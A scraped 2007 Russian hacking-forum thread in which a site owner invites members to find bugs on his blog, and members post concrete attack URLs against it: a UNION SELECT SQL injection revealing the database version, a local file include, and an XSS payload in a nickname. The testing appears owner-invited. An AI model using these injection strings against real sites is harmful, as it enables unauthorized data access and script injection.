Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.05.2007, 16:02
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310
Репутация:
488
|
|
r0
http://r0.jino-net.ru
Найденный баг - мое повышение репутации =)
|
|
|
09.05.2007, 16:39
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
http://r0.jino-net.ru/comments.php?blog_id=32+order+by+5&act=comment
вот пока..
копаю дальше.
|
|
|
|
09.05.2007, 16:41
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
http://r0.jino-net.ru/comments.php?blog_id=32+union+select+1,version(),3 ,4,5/*&act=comment
версия бд
5.0.26-standard
копаю дальше
|
|
|
|
09.05.2007, 16:49
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
504 Gateway Time-out
ыыы
как я буду дальше копать когда оно ушло в даун??
|
|
|
|
09.05.2007, 16:51
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310
Репутация:
488
|
|
BlackCats спасибо.
Done. Кто еще?
504 Gateway Time-out
ыыы
как я буду дальше копать когда оно ушло в даун??
Ну я тут не при делах =)
|
|
|
|
09.05.2007, 17:28
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
http://r0.jino-net.ru/papers.php?down=ххх.пхп
локальный инклуд.. пишеш вместо ххх.пхп название странички и она должжна открыца так:
http://r0.jino-net.ru/ххх.пхп
хотя я незнаю что с этого можно поиметь..
|
|
|
|
09.05.2007, 17:37
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
ну это вроде не уязвомость, но при комментарии можно заюзать тэки вокнуг ника и icq
т.е. например я могу сделать свой ник жирным,курсивным,подчёркну тым, + ещё сделать ссылкой на чтонить - заодно этим сделав его светым.
|
|
|
|
09.05.2007, 17:49
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310
Репутация:
488
|
|
ну это вроде не уязвомость, но при комментарии можно заюзать тэки вокнуг ника и icq
т.е. например я могу сделать свой ник жирным,курсивным,подчёркну тым, + ещё сделать ссылкой на чтонить - заодно этим сделав его светым.
святым? =) Нет, это не уязвимость.. по крайней мере в моем понимании =/
|
|
|
|
09.05.2007, 18:33
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
Не знаю,как это поможет,но я просканил сайт на уязвимости Accuntex Web Vulnerability Scaner'ом,который присвоил критический уровень сайту.Вот отчёт самых "сильных" уязвимостей скачать с рапиды |
|
|
|
09.05.2007, 19:10
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
Пользователь с ником "><script>alert()</script> это круто, также нету проверки правельности ввода аськи и мыла. пароль при авторизации лучше под звездочками сделать. поле ник и пароль при регистрации почти совсем невидно.
если использовать тег юрл то получается он пытается открыть страницу http://r0.jino-net.ru/точтоввеливтег
http://r0.jino-net.ru/showusers.php
и где там юзер номер 5?)))
короче на плюс не притендую просто высказался)
Последний раз редактировалось freddi; 09.05.2007 в 19:17..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
